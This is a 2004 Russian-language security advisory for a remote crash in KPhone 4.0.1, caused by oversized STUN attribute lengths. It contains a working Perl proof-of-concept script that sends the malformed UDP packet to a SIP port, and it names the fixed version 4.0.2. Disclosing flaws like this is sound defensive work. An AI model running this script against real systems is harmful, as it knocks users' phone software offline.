Дата публикации: | 18.04.2004 |
Всего просмотров: | 1131 |
Опасность: | Средняя |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Уязвимые версии: KPhone 4.0.1
Описание: Уязвимость обнаружена в KPhone. Удаленный пользователь может аварийно завершить работу приложения. Удаленный пользователь может послать специально обработанный STUN пакет (с параметром attrLen более 8000 байт), чтобы аварийно завершить работу приложения целевого пользователя. Пример/Эксплоит: #!/usr/bin/perl use IO::Socket::INET; my $buf = join("", "\x01\x01", # BindingResponse "\x00\x01", # MsgLength "A"x16, # GUID "\x00\x00", # Attribute "\x08\x01", # AttrLength "A"x7975 # Value ); my $remote = IO::Socket::INET->new( Proto => 'udp', PeerAddr => '192.168.1.49', PeerPort => 5060); print $remote $buf; URL производителя:http://www.wirlab.net/kphone/ Решение:Установите обновленную версию программы: http://www.wirlab.net/kphone/kphone-4.0.2.tar.gz |
|
Ссылки: | KPhone STUN DoS (Malformed STUN Packets) |